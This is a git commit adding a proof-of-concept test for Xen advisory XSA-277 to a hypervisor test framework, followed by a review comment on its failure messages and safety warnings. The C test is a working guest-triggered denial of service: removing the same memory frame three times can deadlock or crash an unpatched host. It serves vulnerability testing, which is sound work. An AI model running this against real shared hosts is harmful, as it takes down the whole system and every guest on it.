From: Andrew Cooper Date: Tue, 9 Oct 2018 17:59:29 +0000 (+0100) Subject: XSA-277 PoC X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=e8c157a751352c23f5d2c350e27098ec646d89e0;p=people%2Fandrewcoop%2Fxen-test-framework.git XSA-277 PoC Signed-off-by: Andrew Cooper --- diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 732d44c..94527c2 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -126,6 +126,9 @@ guest. @subpage test-xsa-269 - x86: Incorrect MSR_DEBUGCTL handling lets guests enable BTS. +@subpage test-xsa-277 - x86: incorrect error handling for guest p2m page +removals. + @subpage test-xsa-278 - x86: Nested VT-x usable even when disabled. diff --git a/tests/xsa-277/Makefile b/tests/xsa-277/Makefile new file mode 100644 index 0000000..6748004 --- /dev/null +++ b/tests/xsa-277/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-277 +CATEGORY := xsa +TEST-ENVS := hvm64 + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk diff --git a/tests/xsa-277/main.c b/tests/xsa-277/main.c new file mode 100644 index 0000000..1bd06c9 --- /dev/null +++ b/tests/xsa-277/main.c 
@@ -0,0 +1,65 @@
+/**
+ * @file tests/xsa-277/main.c
+ * @ref test-xsa-277
+ *
+ * @page test-xsa-277 XSA-277
+ *
+ * Advisory: [XSA-277](http://xenbits.xen.org/xsa/advisory-277.html)
+ *
+ * Before XSA-277, an error path in the P2M code left a spinlock held when the
+ * guest tried to remove a page which was already not present.
+ *
+ * Attempt to balloon out the same frame three times, to try and force a
+ * deadlock.
+ *
+ * For debug builds of Xen, this should hit an assertion on the return to
+ * guest path. For release builds, the test should never complete, and will
+ * either stall the entire system in the TSC rendezvous, or cause a crash from
+ * the watchdog (if activated).
+ *
+ * @see tests/xsa-277/main.c
+ */
+#include
+
+const char test_title[] = "XSA-277 PoC";
+
+static uint8_t balloon[PAGE_SIZE] __page_aligned_bss;
+
+void test_main(void)
+{
+ unsigned long extents[] = {
+ virt_to_gfn(balloon),
+ };
+ struct xen_memory_reservation mr = {
+ .extent_start = extents,
+ .nr_extents = ARRAY_SIZE(extents),
+ .domid = DOMID_SELF,
+ };
+
+ /* Balloon out once. Should succeed. */
+ if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 1 )
+ return xtf_error("Error trying to balloon out gfn %lx\n", extents[0]);
+
+ /*
+ * Balloon out twice. Should fail, but when vulnerable to XSA-277, the
+ * hypercall will leave the p2m lock held.
+ */
+ if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 0 )
+ return xtf_failure("Fail: Probably vulnerable to XSA-277\n");
+
+ /* Balloon out thrice. If vulnerable, will deadlock. */
+ if ( hypercall_memory_op(XENMEM_decrease_reservation, &mr) != 0 )
+ return xtf_failure("Fail: Probably vulnerable to XSA-277\n");
+
+ xtf_success("Success: Not vulnerable to XSA-277\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
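Review bot: The "Fail: Probably vulnerable to XSA-277" message on the second and third `!= 0` checks does not match the symptom the header comment itself describes: the XSA-277 defect is a p2m lock left held on the error path, which by the file's own account shows up as an assertion or a hang on the third call, not as a non-zero return from XENMEM_decrease_reservation. A non-zero return when removing an already-absent gfn would be a different misbehaviour, so reporting it as XSA-277 is likely to mislead whoever triages the result; capture and print the value instead, e.g. `int rc = hypercall_memory_op(XENMEM_decrease_reservation, &mr);` / `if ( rc != 0 )` / `return xtf_failure("Fail: Unexpected rc %d removing absent gfn %lx\n", rc, extents[0]);` at both sites. It would also help to state in the header comment that, because a vulnerable release build never returns from the third call, the test harness must impose an external timeout and the test should not be run on a shared host, since the stall takes down the whole system rather than just this guest. These points are inferred from the comments in the hunk and from the hypercall's documented return convention; the Xen-side behaviour is not visible here.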